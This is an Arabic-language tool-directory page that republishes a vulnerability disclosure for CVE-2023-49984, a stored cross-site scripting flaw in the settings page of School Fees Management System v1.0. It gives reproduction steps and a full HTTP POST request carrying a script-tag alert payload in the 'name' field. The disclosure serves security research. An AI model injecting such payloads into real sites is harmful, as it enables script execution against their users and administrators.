Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-49984 — School Fees Management System v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في حقل/معامل "name" على "/management/settings" | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-49984
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubgeraldoalcantara/cve-2023-49984

CVE-2023-49984

School Fees Management System v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في حقل/معامل "name" على "/management/settings"

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-49984

School Fees Management System v1.0 - ثغرة برمجة عبر المواقع (XSS) في حقل/معلمة "name" في "/management/settings"

الوصف: توجد ثغرة برمجة عبر المواقع (XSS) في المكون "/management/settings" في نظام إدارة الرسوم المدرسية الإصدار v1.0، تتيح للمهاجمين تنفيذ نصوص برمجية تعسفية أو كود HTML عبر حمولة مصممة يتم إدخالها في معلمة name.

إصدار المنتج المعرض للخطر: School Fees Management System v1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 28/11/2023
تم التأكيد في: 19/12/2023
CVE: CVE-2023-49984
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

لاستغلال الثغرة، يجب على مستخدم لديه الأذونات المناسبة الوصول إلى صفحة "/ci_fms/admin/management/settings". في هذه الصفحة، يجب على المستخدم تعديل الحقول في الإعدادات العامة. يجب إدراج الحمولة الضارة في أحد الحقول التالية: "name" أو "phone" أو "address" أو "bank" أو "acc_name" أو "acc_number".

الطلب:

root@kitploit:~
POST /ci_fms/admin/action/main_settings HTTP/1.1
Host: 192.168.68.148
Content-Length: 209
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=qvpbijnrhr1a3stolsuvdglpo8a7mb3h
Connection: close

name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&phone=09123456987&address=14+Street%2C+There+City%2C+Anywhere%2C+2306&bank=ABC+Bank&acc_name=Our+Best+School&acc_number=123456789874&session=2022-2023

المكتشفون / الإسناد:
Geraldo Alcântara

تنزيل الأداة